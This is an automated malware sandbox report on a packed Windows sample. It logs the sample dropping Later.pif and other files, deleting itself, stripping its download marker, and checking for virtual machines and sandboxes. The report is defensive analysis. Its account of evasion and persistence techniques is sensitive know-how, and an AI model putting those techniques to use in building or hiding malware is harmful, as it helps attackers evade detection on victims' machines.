Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\78801\Later.pif 78801\Later.pif 78801\B	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Process created: C:\Users\user\AppData\Local\Temp\78801\Later.pif C:\Users\user\AppData\Local\Temp\78801\Later.pif	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: vcomp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99B29D3B-368A-4BE6-B675-805A69114497}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb+ source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.mazi:R;.sicas:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wjshsfa	Unpacked PE file: 4.2.wjshsfa.400000.0.unpack .text:ER;.rdata:R;.data:W;.mazi:R;.sicas:R;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

Code function: 7_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

7_2_004062FC

Source: file.exe	Static PE information: section name: .mazi
Source: file.exe	Static PE information: section name: .sicas
Source: wjshsfa.2.dr	Static PE information: section name: .mazi
Source: wjshsfa.2.dr	Static PE information: section name: .sicas

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401CD1 push ecx; ret	0_2_00401CD2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401C91 push 00000076h; iretd	0_2_00401C93
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402E96 push B92A2F4Ch; retf	0_2_00402E9B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021D1D38 push ecx; ret	0_2_021D1D39
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021D2EFD push B92A2F4Ch; retf	0_2_021D2F02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021D1CF8 push 00000076h; iretd	0_2_021D1CFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_022A9B6C push FFFFFFFBh; iretd	0_2_022A9B82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_022A7AEE push edx; ret	0_2_022A7AEF
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_02159C9C push FFFFFFFBh; iretd	4_2_02159CB2
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_02157C1E push edx; ret	4_2_02157C1F
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_02241D38 push ecx; ret	4_2_02241D39
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_02242EFD push B92A2F4Ch; retf	4_2_02242F02
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_02241CF8 push 00000076h; iretd	4_2_02241CFA
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C18AA5 push ecx; ret	19_2_00C18AB8
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C00A5D push 739D00C3h; ret	19_2_00C00A66
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF8D64 push ss; ret	19_2_00BF8D66
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7DFF push es; ret	19_2_00BF7E05
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7DFC push es; ret	19_2_00BF7DFD
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7DF2 push es; ret	19_2_00BF7DF9
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7E1E push es; ret	19_2_00BF7E21
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7E1A push es; ret	19_2_00BF7E1D
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7E16 push es; ret	19_2_00BF7E19
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7E0F push es; ret	19_2_00BF7E11
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF7E08 push es; ret	19_2_00BF7E09
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0142C408 push esp; ret	19_2_0142C409
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0148B1AE push cs; iretd	19_2_0148B1AF
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014D9405 push ecx; ret	19_2_014D9418

Source: file.exe	Static PE information: section name: .text entropy: 6.979655173728229
Source: wjshsfa.2.dr	Static PE information: section name: .text entropy: 6.979655173728229

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wjshsfa	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9CFE.exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wjshsfa

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\wjshsfa:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C7577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		19_2_00C7577B
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C05EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		19_2_00C05EDA

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C132E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_00C132E9

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

Stalling execution: Execution stalls by calling Sleep

graph_7-3897

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\wjshsfa	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\wjshsfa	API/Special instruction interceptor: Address: 7FF8C88ED584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, 00000000.00000002.2183164619.00000000022B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: wjshsfa, 00000004.00000002.2417069266.0000000002160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK<Q5H

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Thread delayed: delay time: 1200000

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 463	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4694	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 861	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 355	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 895	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 856	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_19-175012

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

API coverage: 4.9 %

Source: C:\Windows\explorer.exe TID: 4456	Thread sleep count: 463 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6164	Thread sleep count: 4694 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6164	Thread sleep time: -469400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3408	Thread sleep count: 861 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3408	Thread sleep time: -86100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep count: 301 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5524	Thread sleep count: 355 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5524	Thread sleep time: -35500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5468	Thread sleep count: 333 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5468	Thread sleep time: -33300s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6256	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif TID: 6620	Thread sleep time: -19200000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_004062D5 FindFirstFileW,FindClose,	7_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_00402E18 FindFirstFileW,	7_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_00C5C16C
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C547B7 GetFileAttributesW,FindFirstFileW,FindClose,	19_2_00C547B7
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5CB81 FindFirstFileW,FindClose,	19_2_00C5CB81
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_00C5CC0C
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00C5F445
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00C5F5A2
